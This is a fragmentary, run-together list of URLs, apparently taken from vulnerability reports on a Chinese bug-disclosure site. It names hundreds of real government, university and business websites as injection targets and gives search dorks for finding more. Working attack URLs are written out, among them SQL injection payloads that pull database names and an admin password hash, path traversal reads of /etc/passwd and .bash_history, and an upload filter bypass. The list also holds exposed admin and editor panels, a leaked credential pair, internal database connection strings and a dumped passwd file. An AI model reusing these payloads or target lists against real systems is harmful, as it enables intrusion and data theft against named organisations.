http://cs.longtugame.com/question/rechview?qid=380000 http://www.025journal.com/ http://www.025journal.com/demo1/ http://www.025journal.com/demo2/ http://www.025journal.com/Web/CommonPage.aspx?Id=8 http://www.doclass.com/ http://www.doclass.com/page/school1.html http://www.doclass.com/page/school2.html http://www.doclass.com/page/school3.html http://www.doclass.com/page/school4.html http://app.doclass.com/xtreg/UserReg/UserReg.aspx http://www.czsz.cn/schinfo/passport/login.aspx http://wyx.creditease.cn/manage/index.jsp http://www.wecrm.com/ http://www.wecrm.com/static/consumer/ http://120.31.131.166:82/ http://120.31.131.166:82/soft_series_cps.php?series_id=-1 http://120.31.131.166:82/soft_series_cps.php?series_id=-1 http://sqlmap.org http://www.zh0379.com/ http://www.bfyhyc.com/sztdxx.asp?id=726&kind=58 http://www.bflad.com/sztdxx.asp?id=720&kind=46 http://www.luoyangxiaofang.com/sztdxx.asp?id=708&kind=58 http://www.lycbxf.com/sztdxx.asp?id=699&kind=46 http://dzj777.com/sztdxx.asp?id=782&kind=58 http://tjchangguan.com/sztdxx.asp?id=717&kind=57 http://www.lydahua.com.cn/sztdxx.asp?id=663&kind=69 http://www.13937942506.com/sztdxx.asp?id=815&kind=117 http://lyjzdz.com/sztdxx.asp?id=762&kind=61 http://www.liangxianjun.com/sztdxx.asp?id=1012&kind=46 http://www.qqldw.cn/sztdxx.asp?id=705&kind=46 http://www.liangxianjun.com/sztdxx.asp?id=1004&kind=46 http://www.bfyhyc.com/sztdxx.asp?id=726&kind=58 http://tjchangguan.com/sztdxx.asp?id=717&kind=57 http://wow.laoyuegou.com/guild/newsInfo/id/33725%20AND%20EXTRACTVALUE%289942,CONCAT%281,user%28%29,0x7c,version%28%29%29%29.html http://www.sxfda.cn/manager/upfile.asp http://www.sxfda.cn/manager/zp/nohack.asp;.jpg http://180.153.223.60:8080/ inurl:aboutus.php?type= http://www.goo17.com http://www.goo17.com/api/ad.php?id=4&catid=1&name=%27 http://www.jiejie365.com/api/ad.php?id=4&catid=1&name=%27 http://j.jiagle.com/api/ad.php?id=16&catid=4&name=%27 http://www.doclass.com/)的 http://www.shixi.stn.sh.cn/schinfo/passport/Trans.aspx?UserName=1%27%2B+%28select+convert%28int%2C%28db_name%281%29%29%29+FROM+syscolumns%29+%2B%27&Password=S7lLvow2vE0T%2fjEneuKWjg%3d%3d http://www.shixi.stn.sh.cn/schinfo/passport/Trans.aspx?UserName=a&Password=S7lLvow2vE0T/jEneuKWjg== www.doclass.com这里找,或者给出一些: http://www.shsmly.com/schinfo/passport/Trans.aspx?UserName=a&Password=S7lLvow2vE0T/jEneuKWjg== http://www.shixi.stn.sh.cn/schinfo/passport/Trans.aspx?UserName=a&Password=S7lLvow2vE0T/jEneuKWjg== http://218.1.117.169/schinfo/passport/Trans.aspx?UserName=a&Password=S7lLvow2vE0T/jEneuKWjg== http://www.czsz.cn/schinfo/passport/Trans.aspx?UserName=a&Password=S7lLvow2vE0T/jEneuKWjg== http://www.jzrongda.com/ inurl:xwInfo.php http://www.yuxinhn.com/admin/login.php http://www.jz-feihong.com/xwInfo.php?id=9 http://www.jzjgjt.com/xwInfo.php?id=1574 http://116.255.153.184/www.jzjgjt.net/xwInfo.php?id=1308 http://www.jzgyjc.com/xwInfo.php?id=6 http://dongqichang.comwww.zhidong7.com/www.jzjgjt.net/xwInfo.php?id=346 http://142.nrns0ie7.jxspyl.com/www.qykjj.net/xwInfo.php?id=45 http://www.hnstz.com/xwInfo.php?id=1 http://www.jzs8jd.com/xwInfo.php?id=123 http://www.ylzhy.com/xwInfo.php?id=10 http://www.hngyjc.com/xwInfo.php?id=5 http://ww.hntgglc.com/www.jzjgjt.net/xwInfo.php?id=149 http://www.syfyp.com/xwInfo.php?id=10 http://www.qykjj.net/xwInfo.php?id=50 http://www.hnycdq.com/xwInfo.php?id=56 http://www.rongtaijieneng.com.cn/xwInfo.php?id=21 http://www.hnpanyue.com/xwInfo.php?id=11 http://www.jinghua-food.com/xwInfo.php?id=28 http://www.jhyjx.com/xwInfo.php?id=5 http://www.qycxjsw.com/xwInfo.php?id=3 http://www.hxzd.cn/xwInfo.php?id=6 http://www.cx-wl.com/ inurl:readnews.asp http://www.jierui-cnc.com/readpro.asp?id=1925 http://www.raruijian.com/readpro.asp?id=3234 http://www.shengzaoqp.com/cn/readpro.asp?id=3593 http://www.yanfeimachinery.com/readpro.asp?id=530 http://www.linmojixie.com/cn/readpro.asp?id=2150 http://www.dayunpy.com/readpro.asp?id=3359 http://www.wxhz.net/readpro.asp?id=293 http://www.hymjg.com/readpro.asp?id=3872 http://www.hengshundz.com/readpro.asp?id=3073 http://www.raxtjx.com/readpro.asp?id=3226 http://www.bangjichina.com/cn/readpro.asp?id=2117 http://www.wdmjg.com/readpro.asp?id=3573 http://zjzhongao.com/readpro.asp?type_id=198&id=2443 http://www.yjkswl.com/readpro.asp?id=2137 http://www.rajiansheng.com/cn/readpro.asp?id=2145 http://www.wzrcjx.com/readpro.asp?id=3165 http://www.zj8888.com/cn/readpro.asp?id=532 http://www.chinajczs.com/readpro.asp?id=3370 http://www.raxcjx.com/cn/readpro.asp?id=2082 http://www.yihaomoju.com/readpro.asp?id=1956 http://www.wxhzw.net/readpro.asp?id=343 http://www.wenruipy.com/readpro.asp?id=3330 http://www.rayljx.com/readpro.asp?id=1969 http://zjltdq.com/readpro.asp?id=2032 http://www.zs888888.com/readpro.asp?id=3599 http://www.bxgstmj.com/cn/readpro.asp?id=2157 http://www.hzcable.net/readpro.asp?id=568&boardid=8 http://www.cx-wl.com/ inurl:readnews.asp http://www.hongbaochina.com/readnews.asp?id=22 http://www.ralifan.com/readnews.asp?id=51 http://www.chunyu-china.com/readnews.asp?id=19 http://www.chinahengshun.com/readnews.asp?id=22 http://www.rahuafeng.com/cn/readnews.asp?id=16 http://ydqd.net/readnews.asp?id=22 http://ragjzz.com/readnews.asp?id=18 http://www.cx-wl.com/readnews.asp?id=63 http://www.wzshenyu.com/readnews.asp?id=22 http://www.ramiaomu.com/readnews.asp?id=22 http://ruiliyj.com/readnews.asp?id=17 http://13958974119.com/readnews.asp?id=22 http://www.rahongtai.net/readnews.asp?id=57 http://razhuozheng.com/readnews.asp?id=41 http://www.shengzaoqp.com/cn/readnews.asp?id=22 http://www.zjbaixiao.com/cn/readnews.asp?id=47 http://www.meijiate.net/readnews.asp?id=60 http://65662899.com/readnews.asp?id=33 http://www.dayunpy.com/readnews.asp?id=69 http://www.linmojixie.com/cn/readnews.asp?id=47 http://www.anmogun.com/readnews.asp?id=67 http://www.chinaruibang.com/cn/readnews.asp?id=37 http://www.65565508.com/readnews.asp?id=51 http://www.wdmjg.com/readnews.asp?id=56 http://www.bangjichina.com/cn/readnews.asp?id=50 http://www.raxcjx.com/cn/readnews.asp?id=52 http://www.yihaomoju.com/readnews.asp?id=53 http://www.shengdongjx.net/readnews.asp?id=59 http://www.66618760.com/readnews.asp?id=20 http://www.8ycn.com/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞第二弹。 http://www.lushengmetal.com/en/products_display.php?keyno=30313 http://www.tianjianchina.com/products_display.php?keyno=29874 http://www.sdxcgd.com/products_display.php?keyno=51467 http://www.sdxinlei.com/products_display.php?keyno=53691 http://www.bzbinhai.com/products_display.php?keyno=52243 http://www.sdmlw.com/products_display.php?keyno=34854 http://www.sdxhyz.com/products_display.php?keyno=51717 http://www.sdsxmm.com/products_display.php?keyno=51831 http://pengxian.8ycn.com.cn/products_display.php?keyno= http://www.bzjdqd.com/products_display.php?keyno=52400 http://www.sdjwd.com/products_display.php?keyno=31240 http://www.sdyssw.com/products_display.php?keyno=61807 http://www.bztianma.com/products_display.php?keyno=51838 http://www.bzajst.com/products_display.php?keyno=52015 http://www.xhzxsw.com/products_display.php?keyno=51595 http://www.bzjzlxs.com/products_display.php?keyno=52057 http://www.bzsdmm.com/products_display.php?keyno=39411 http://www.cnynmy.com/products_display.php?keyno=53349 http://www.bzglsm.com/products_display.php?keyno=32313 http://www.dubangchuye.com/products_display.php?keyno=64251 http://www.bzdelixi.com/products_display.php?keyno=50282 http://www.bzqezl.com/products_display.php?keyno=36732 http://www.hmbaila.com/products_display.php?keyno=51134 http://www.wdxzx.com/products_display.php?keyno=37216 http://www.mituofo.net/products_display.php?keyno=37128 http://www.sdcfcg.com/products_display.php?keyno=35098 http://www.cnjjgm.com/products_display.php?keyno=41677 http://www.bzfyzl.com/products_display.php?keyno=50765 http://www.txjzy.com/products_display.php?keyno=52747 http://www.sdmdxg.com/products_display.php?keyno=39539 http://www.sdcymc.com/products_display.php?keyno=28094 http://www.sdhyjx888.com/products_display.php?keyno=36076 http://zhzzdz.com/products_display.php?keyno=58229 http://www.sdjsqjt.com/products_display.php?keyno=45443 http://huoguoyu.com/products_display.php?keyno=47006 http://bzxsdbj.cn/products_display.php?keyno=53870 http://www.bzbingang.com/products_display.php?keyno=59177 http://www.hmlxmy.com/products_display.php?keyno=51369 http://www.ysddc.com/products_display.php?keyno=51641 http://www.zphbsjc.com/products_display.php?keyno=42053 http://www.sdchunxiang.com/products_display.php?keyno=9926 http://www.bzbygc.com/products_display.php?keyno=41705 http://www.kdspjx.com/products_display.php?keyno=37753 http://admin.qa.gameplus.sdo.com www.m10060.com http://www.m10060.com:80/ www.m10060.com http://61.49.17.106 http://zhidao.yinyuetai.com/redirct_index.htm http://127.0.0.1/diguo7/e/ShopSys/address/AddAddress.php?enews=AddAddress http://127.0.0.1/diguo7/e/member/mspace/?enews=DelMemberGbook&gid=4 http://youwu.jiemian.com http://youwu.jiemian.com http://east.ent.9you.com/butterfly/index.php?r=News/GetNewsList&order=comment&num=10&page=1&author=42【注入点】&jsonp=jQuery19104597843303345144_1412652260947&_=1412652260952 http://www.toread.com.cn/ftadmin/login.php?gotopage=%2Fftadmin%2Findex.php http://自己网站/a.js http://lhshop.9you.com/itemlist.php?pid=1&type=【注入点】&sex=2&s=11 http://oa.gwbnsh.net.cn/FCKeditor http://oa.gwbnsh.net.cn/Member/MemberDelete.aspx http://oa.aqtc.edu.cn/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Aflavor%3DURL%2Ctype%3DDeploymentScanner http://61.163.228.116:7001/upload/up04/163/mkzy.jsp http://xszz.njtech.edu.cn/),发现SQL注入点一个:http://xszz.njtech.edu.cn/showart.asp?cat_id=12&art_id=1581 http://xszz.njtech.edu.cn/admin.asp www2.bjfu.edu.cn/yzh/admins/admin_index.asp http://www.cctrl.net/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 http://www.xxxx.com/cctrl/admin/ad_login.php http://forland.foton.com.cn/wap/new_detail.php?id=213&sortid=2 http://www.qingdaozhn.com/new_detail.php?id=211&sortID=4 http://www.jinhai.net.cn/new_detail.php?id=482&sortid=30&pID= http://www.51future.cc/new_detail.php?id=10&sortid=13 http://www.haizhoutd.com/new_detail.php?id=18&sortid=10 http://www.xinshunjiaju.com/new_detail.php?id=135 http://www.chinaxnny.com/new_detail.php?id=3&sortid=9 http://www.qdkqwy.com/new_detail.php?sortid=17&id=203 http://www.dxrq.com/new_detail.php?id=22&sortid=9 http://www.cymchina.com/new_detail.php?id=5&sortid=10 http://tianzhengjiaye.com/new_detail.php?id=54 http://yhlmy.com/new_detail.php?id=5&sortid=9 http://sekisuijushichina.com/new_detail.php?id=5 http://www.haiyuankuaiji.com/new_detail.php?id=64 http://water-green.com/new_detail.php?id=91&sortid=11 http://101.227.9.90/ http://218.10.43.102:8081/assess/ http://116.211.29.183:8080/scripts/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://116.211.29.184:8080/scripts/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://116.211.29.172/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://wxy.hqu.edu.cn/hqdx/jqjdx.asp?id=15 http://sd.189.cn/resource20140218.tar http://www.gdbbk.com/gdbbk.com.rar http://xinyi.creditease.cn/ajax.do?action=download&file=../../../../../../../../../../etc/passwd xinyi.creditease.cn/ajax.do?action=download&file=../../../../../../../../../..//home/xinyi/.bash_history http://xinyi.creditease.cn/webadmin/login.jsp http://www.gps199.cn/login.aspx http://116.211.28.18/rpl/ mir3:mir3 http://wooyun.org/bugs/wooyun-2014-078950 http://101.227.2.70/search/ http://jinjiangcard.com/ http://wooyun.org/bugs/wooyun-2010-031239 http://mstore.wo.com.cn/index.action http://mstore.wo.com.cn/haha.jsp http://www.lygdfrcb.com/ckfinder/ckfinder.html?action=js&func=SetFileField&data=xPicture&thumbFunc=ShowThumbnails&start=Images.asp%3A%2F%3A0 http://www.lygdfrcb.com/ckfinder/ckfinder.html http://210.37.0.36/ http://210.37.0.57:88/edoas2/oa.jsp http://210.37.2.90/ http://ningxia.12388.gov.cn/xcms/nxlzjb/Jubao.do http://www.cicro.com/ inurl:jsp/zwgk/ http://www.yanliang.gov.cn/jsp/zwgk/browser/main.jsp?deptid=yanl000051 http://www.jingbian.gov.cn//jsp/zwgk/browser/content.jsp?id=5051 http://www.gsjyg.cn//jsp/zwgk/browser/content.jsp?id=3688 http://nanyang.gov.cn//jsp/zwgk/browser/wcontent.jsp?id=10973&nodeid=ny00001859&siteid=ny%27 http://www.xy.gov.cn//jsp/zwgk/browser/content.jsp?id=295 http://sj.shufe.edu.cn//jsp/qikan/browser/content.jsp?id=4344 http://www.xjmd.gov.cn//jsp/zwgk/browser/content.jsp?id=2864 http://democn.shop-builder.cn/ https://github.com/ulinke/phpb2b/archive/master.zip http://111.13.51.233:8080/index.action http://en.shop-builder.cn/main.php?m=member&s=admin_orderadder http://122.227.164.8/gps/login.jsp url:http://student.gaosiedu.com/KnowledgeTree/Function/KnowledgeTree.ashx?cmd=GetKnowledgeClassLesson&sKnowledgeCode=1 http://web.hrbnu.edu.cn/mkszyxy http://web.hrbnu.edu.cn/mkszyxy/admin/ http://www.wayboo.cn/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 http://www.xayfds.net/pics.php?class=215 http://www.shfuhai.com/pics.php?class=26 http://www.bdjyjx.com/pics.php?class=33 http://www.pbdt360.com/pics.php?class=396 http://www.lilongeps.cn/pics.php?class=60 http://www.xhbzdc.com/wap/pics.php?class=122 http://www.bjznxf.com/pics.php?class=69 http://www.qiqiangjx.com/pics.php?class=19 http://bibojsj.com/pics.php?class=108 http://www.sxtongtu.com/pics.php?class=51 http://www.zzpjjg.com/pics.php?class=42 http://www.jndsmm.com/pics.php?class=54 http://www.changchunyida.com/wap/pics.php?class=107 http://www.lnsbhg.com/wap/pics.php?class=35 http://www.xawhmc.com/pics.php?class=136 http://sjzbangongjiaju.com/pics.php?class=63 http://www.bjqzxr.net/pics.php?class=66 http://kyfcan.com/pics.php?class=58 http://www.lilongeps.com/pics.php?class=81 http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt http://www.yqcqfda.gov.cn/docc/shownews1.asp?id=589 http://www.yqcqfda.gov.cn/adminqibo5/Login.asp https://pub1.mca.gov.cn:8443/ www.shanghaicentre.com/download.php?file=download.php http://oa.tongji.edu.cn/login/Login.jsp?logintype=1 http://oa.tongji.edu.cn/wui/theme/ecology7/page/login.jsp?templateId=21&logintype=1&gopage=&languageid=7&message=17 inurl:yktguanli http://pay.4399.com/pay_to_show.php?orderId=订单号 http://dns.www.net.cn/tcdomainretrieval/sendauthcode http://ca.its.csu.edu.cn/home/login http://tieba.baidu.com/p/1482903508?pid=18336668015&cid=0#18336668015)找到的一个学工号111612527,得知前两位是代表11级。 http://my.its.csu.edu.cn/MyInformation/MyPasswordModify_2/141611166 http://nbic.ujn.edu.cn/sdpklnbic/nbicnews/echobin.php?id=1 http://www.qzyixiaotong.com/ischool/login.jsp www.qzyixiaotong.com http://www.qzyixiaotong.com inurl:/opac_two/search2 http://211.151.175.47 http://211.151.175.47/loginact.php http://211.151.175.47/usermanage/admin_adduser.php?id=2 http://211.151.175.48/ http://211.151.175.47/ http://211.151.175.48/loginact.php http://211.151.175.48/usermanage/admin_adduser.php?id=2 http://www.epp.ac.cn/activity.asp?NewsTypeId=2 http://www.epp.ac.cn/allContent.asp?NewsTypeId=1 http://www.epp.ac.cn/NewsView.asp?NewsId=267 http://www.wom186.com/smzdj http://www.hebcar.com/fckeditor/editor/filemanager/connectors/test.html http://sdkhttp.eucp.b2m.cn/sdk/SDKService?wsdl,0,3687 http://www.jissbon.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 admin:9627739dc34a7c300cbb| http://www.jissbon.com/plus/ad_js.php?aid=1 http://www.jissbon.com/include/ http://www.jissbon.com/data/ http://xbbjb.nau.edu.cn/view_news.aspx?id=20131114101314001 inurl:/authorLogOn.action?mag_Id= http://www.jnr.ac.cn/journalx_zrzy/authorLogOn.action?mag_Id=1 http://www.iwt.cn/journalx_gyscl/authorLogOn.action?mag_Id=1 http://gclx.tsinghua.edu.cn/JournalX_gclx/authorLogOn.action?mag_Id=1 http://ctp.itp.ac.cn/journalx_llwl_en/authorLogOn.action?mag_Id=1 http://118.145.16.213:8080/journalx_jryj/authorLogOn.action?mag_Id=1 http://www.zgsyhlzz.com:8080/journalx_syhl/authorLogOn.action?mag_Id=7 http://cea.ceaj.org/journalx_jsjgc/authorLogOn.action?mag_Id=1 http://newlva.chinaelc.cn/journalx_dydq/authorLogOn.action?mag_Id=1 http://www.lyxk.com.cn/JournalX_lyxk/authorLogOn.action?mag_Id=1 http://www.chinchemlett.com.cn/journalx/authorLogOn.action?mag_Id=7 site:dayoo.com inurl:api http://bm.huatu.com/data.rar http://ljlwx.speiyou.com/lejiale/login/login_index.action http://yingyuzizhao.speiyou.com/SHenglish/login!toLogin.action http://whuodong.speiyou.cn/weixinbaoming/login/login_index.action http://tjj.stats-sh.gov.cn/rkpc/moban.asp?id=769 wxy.hqu.edu.cn/hqdx/ggfw.asp?id=18 wxy.hqu.edu.cn/hqdx/ggfw.asp?id=18 http://sqlmap.org http://www.gtfg.gov.cn/detail/news.asp?nid=1401 http://www.bdghj.gov.cn/user/view.asp?id=4122 http://42.121.252.129/admin/home/Login http://www.wmfww.gov.cn/NewsView.asp?id=54 https://120.194.234.178:8081/welcome.php http://job.100tal.com http://job.100tal.com:80/ http://www.yw365.gov.cn:9999/admin/downLoadGonggaoAtta.action?filePath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts&fileName=1.txt http://www.alsxzsp.gov.cn/htmlylc/downLoadGonggaoAtta.action?filePath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts&fileName=1.txt http://www.zwfw.gov.cn/1664zwts/downLoadGonggaoAtta.action?filePath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts&fileName=1.txt http://www.cnhuashuo.com/ inurl:productview.asp http://www.zy-hyd.com/productview.asp?id=1 http://www.mblamps.com/productview.asp?id=60 http://www.cnquansheng.com/productview.asp?id=34 http://www.ap-pump.com/productview.asp?id=122 http://www.cnlaihe.com/productview.asp?id=90 http://www.mohe-pc.com/productview.asp?id=1 http://www.china-taiyide.com/productview.asp?id=29 http://www.nb-jydz.com/productview.asp?id=11 http://www.nbhansen.com/productview.asp?id=34 http://www.nbtybxg.com/productview.asp?id=1 http://www.jbclamps.com/productview.asp?id=152 http://www.nblongxiang.com/productview.asp?id=1 http://www.lk-spbzjx.com/productview.asp?id=21 http://www.nbysd.com/productview.asp?id=54 http://www.nbck168.com/productview.asp?id=1 http://www.fhdzlz.com/productview.asp?id=3 http://www.peryew.com/productview.asp?id=149 http://yyghsz.com/productview.asp?id=2 http://www.cxmzy.cn/productview.asp?id=7 http://www.nbhggz.com/productview.asp?id=10 http://www.yxlamps.com/productview.asp?id=160 http://www.yyszwj.cn/productview.asp?id=1 http://www.linyijieju.com/productview.asp?id=19 http://www.liaoming-dengju.com/productview.asp?id=87 http://www.nbblth.com/productview.asp?id=44 http://www.nbrenteng.com/productview.asp?id=25 http://119.161.147.29/userLogin.aspx http://218.200.202.109:8000/Login.aspx http://tx3.netease.com/ http://xy2.netease.com/ http://xy3.netease.com/ http://wh.netease.com/ http://y3.netease.com/ http://zh.netease.com/ http://jl.netease.com/ http://zd.netease.com/ http://cc.netease.com/ http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt http://map.sogou.com/bbs/ http://www.einfo.net.cn/home2012/onews.asp?id=1434 http://www.einfo.net.cn/home2012/onews.asp?id=1434 https://itunes.apple.com/cn/app/bing/id345323231?mt=8 http://test.m4sk.net/phone.html tel:10086 http://feedback.doshow.com.cn/feedback/addFeedback.action http://yn.189.cn/shop/query/my_order/order_detail.jsp?ord_code=**************&phone_num=*********** inurl:yn.189.cn/shop/query/my_order/order_detail.jsp?ord_code= http://www.hrbcb.com.cn/card/service.do http://www.hrbcb.com.cn/card/merchant.do http://museum.ustb.edu.cn/data/mysql_error_trace.inc http://ucenter.enet.com.cn/avatar.php?uname=igrid2013'&size=samll http://www.cctrl.net/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 inurl:news.php?sortid= http://www.xxxx.com/cctrl/admin/ad_login.php forland.foton.com.cn/wap/news.php?sortid=3 http://www.qdnwj.com/news.php?sortID=8 www.qingdaozhn.com/news.php?sortID=4 www.qdjfyjd.com/news.php?sortID=53 www.xdl-china.com/news.php?sortID=10 www.qdzhongze.com/news.php?sortid=3 www.blwhcb.com/news.php?sortid=10 www.qdxcfj.com/news.php?sortID=5 http://www.oukem.com/news.php?sortid=12 www.dehewuye.com/news.php?sortid=45 www.qdjiarun.net/news.php?sortID=2 www.qddbzj.com/news.php?sortID=7 www.weihaishanghui.com/news.php?sortid=41 www.jinhai.net.cn/news.php?sortid=48 www.qdtmjg.com/news.php?sortid=12 www.quannengchina.net/news.php?sortID=10 www.qdhengxin.net/news.php?sortid=56 www.51future.cc/news.php?sortid=50 www.sakuraqd.com/news.php?sortid=17 www.yimucg.com/news.php?sortid=10 www.qdbast.com/news.php?sortid=9 www.qdkqwy.com/news.php?sortid=16 www.qdtongxueguan.com/news.php?sortid=14 www.shanhaitian.com/news.php?sortID=12 www.ssjs-china.com/news.php?sortid=10 www.qdfzsz.com/news.php?sortID=18 www.qingyuan7.com/news.php?sortID=12 www.qingdaozhongzhixin.com/zhongxin/news.php?sortid=16 www.qdouren.com/news.php?sortID=5 www.donghaichina.net/news.php?sortID=11 www.qdouren.com/news.php?sortID=54 www.qingdaozhongzhixin.com/zhongxin/news.php?sortid=16 www.qdcjw.com/news.php?sortID=4 www.jhdgyp.com/news.php?sortid=8 www.qdbes.com/news.php?sortid=8 www.tairuilong.com/news.php?sortid=5 http://**.**.**/还有部分目录遍历的情况!这个是在游戏配置文件中找到的!_ http://m.roboo.com/ http://app.roboo.com/app/download.htm http://union.cqvip.com/FindPWD2.asp?UserName=admin http://union.cqvip.com/checkusername.asp?UserName=admin http://uxss.sinaapp.com/index.php http://yaoguobbs.duowan.com http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt http://forum.meizu.com/ http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt http://222.204.208.4/Site/model/TwoGradePage/stuyuxi/gzzd.aspx?id=1 http://dxsb.qfnu.edu.cn/model/TwoGradePage/stuyuxi/gzzd.aspx?id=16 http://182.129.150.10:8001/model/TwoGradePage/stuyuxi/gzzd.aspx?id=32 http://202.206.48.106/model/TwoGradePage/stuyuxi/gzzd.aspx?id=13 http://labch.cumt.edu.cn:81/model/TwoGradePage/stuyuxi/gzzd.aspx?id=15 http://dxsb.qfnu.edu.cn/model/TwoGradePage/stuyuxi/gzzd.aspx?id=16 http://zz.sdlgzy.com/site/train/gzzd.aspx?id=663 http://hywl.nbu.edu.cn/model/TwoGradePage/stuyuxi/gzzd.aspx?id=11 http://wsdj.baic.gov.cn/ http://wsdj.baic.gov.cn/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector jdbc:oracle:thin:@172.25.78.227:1521:ORCL jdbc:oracle:thin:@192.168.100.11:1521:orcl http://kfmail.sdo.com/ IP:218.29.140.102 https://mail.cnachk.com/ http://w.51tv.com/51tv/dtl.jsp?id=757573755 http://w.51tv.com/51tv/dtl.jsp?id=757573755 http://114.255.12.121/user_logout.action http://www.nyagri.gov.cn/FCKeditor/editor/filemanager/upload/test.html http://www.cmfhk.com/news_type.asp?id=471 http://b.agent.fang.com/magent/House/trade/HouseManager.aspx?action=del&id=8888 http://b.agent.fang.com/magent/House/trade/HouseManager.aspx?action=del&id=52707 www.ykdfdj.gov.cn/newsinfo.php?id=26 www.sxxd.gov.cn/include/content.php?id=843 www.sxlgz.gov.cn/vote/index_show.php?pid=1 www.pd12333.gov.cn/templets/xuejing.php?id=2908 www.jzjzy.gov.cn/zwgklist.php?infoclass=3 cyxmk.hbjyj.gov.cn/details.php?id=86 jsfamous.js.cei.gov.cn/cybj1.php?id=1391 jdz.nbfet.gov.cn/detail.php?id=22 rs.shouxian.gov.cn/bbjg/index.php?id=108&ty=108 sldx.ww.gov.cn/dwjs/index.php?ty=529 ldjc.cckc.gov.cn/show.php?classid=6&id=169 jsfamous.js.cei.gov.cn/cybj1.php?id=1391 dwzwgk.shitai.gov.cn/list/list_2.php?pid=21&ty=22 zkzx.nwnu.edu.cn/zkcs/zkcs_show.php?zkcs_id=1 zgz.ahhs.gov.cn/inter/index.php?id=4 yyshx.ctgu.edu.cn/list.php?fid=6 yxyx.ctgu.edu.cn/list.php?fid=41 xsc.xynun.edu.cn/list.php?bid=98 xzold.ahhs.gov.cn/include/show_news.php?id=1270 www.zljmz.gov.cn/list.php?cid=1 www.zgshuiwu.gov.cn/news.php?id=321 www.zg12333.gov.cn/uploadnews/2011118110212_20825.php?id=423 www.ykrcw.gov.cn/cgzs.php?sid=7 www.ykjt.gov.cn/jtgk.php?id=1 www.ykbh.gov.cn/tzhj.php?id=3 www.yjfan.net/index.php?m=new_look&typeid=5&id=43 www.wjxrd.gov.cn/include/web_content.php?id=82596 www.wjxtjj.gov.cn/include/web_content.php?id=82741 www.wjyt.gov.cn/include/web_content.php?id=82546 www.wjxjt.gov.cn/list/index.php?zlm=900&ty=2030 www.wjxcg.cn/include/web_content.php?id=76625 www.wjsj.gov.cn/vote/result_view.php?id=40 www.wjlzw.gov.cn/banshi/index.php?pid=34&ty=35 www.wjmzj.gov.cn/include/diaocha_view.php?id=6 www.wjlsj.gov.cn/include/web_content.php?id=82271 www.wjcl.gov.cn/include/web_content.php?id=78246 www.whycyjy.sdu.edu.cn/articel_view.php?id=324 www.lyh.wust.edu.cn/ggtzShow.php?action=20&ggtzID=148 www.mjzgsw.gov.cn/news.php?id=162 www.hbdj.gov.cn/include/view_jgzn.php?id=21 www.haxx.lss.gov.cn/msg/investigation.php?invesid=1 www.gnhz.sdu.edu.cn/about.php?id=7 www.fxxkjj.gov.cn/kpyd/index.php?ty=44 www.fl.ldu.edu.cn/about.php?f_type=2 www.cyzzb.gov.cn/uploadnews/123655869323895.php?id=612 www.bledu.gov.cn/tdjs.php?cat_id=28 wsxx.cdu.edu.cn/about/About.php?ID=1 www.ahdzch.gov.cn/about.php?left=1&art_id=2 wlsy.sut.edu.cn/main/homeAnnounceDetail.php?id=51 tyxy.ctgu.edu.cn/list.php?fid=1 tmyjz.ctgu.edu.cn/list.php?fid=5 tcold.ahhs.gov.cn/include/show_news.php?id=830 sthj.ctgu.edu.cn/list.php?fid=1 sope.ruc.edu.cn/displaynews.php?id=206 sldx.ww.gov.cn/dwjs/index.php?ty=529 sjj.ahhs.gov.cn/jgjs.php?S_ty=43 qzlx.cumtb.edu.cn/info.php?id=432 radio08.cumtb.edu.cn/news.php?id=141959 qzlx.aqcz.gov.cn/show.php?id=420 pksy.xjtu.edu.cn/newsDetail.php?type=&newsID=201 mua.whu.edu.cn/jijin-detail.php?recordID=1 mcchm.ctgu.edu.cn/list.php?fid=1 mhjl.jlta.gov.cn/item.php?id=35 mcxf.quanjiao.gov.cn/xf/show.php?id=60&tid=761 logic.swu.edu.cn/zxdt5.php?id=191 ltz.ahhs.gov.cn/about.php?S_ty=43 ldjc.cckc.gov.cn/show.php?classid=6&id=169 jiwei.hebau.edu.cn/list1.php?cid=2 fao.hebut.edu.cn/news_sub.php?id=346 esd.gdsyzx.edu.cn/about.php?cid=11014 english.qqhr.gov.cn/xinwen.php?id=210 dangxiao.ustc.edu.cn/theory_detail.php?id=44 dwzwgk.shitai.gov.cn/list/list_2.php?pid=21&ty=22 cyxmk.hbjyj.gov.cn/details.php?id=86 cbrc.yxy.wmu.edu.cn/news_content.php?id=27 bwc.ctgu.edu.cn/list.php?fid=5 100.cumtb.edu.cn/info.php?id=208 http://www.cnlaw.cn http://**.**.**/callcenter_new/file/a.jspsort=1&file=%2Fetc%2Fhosts root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin 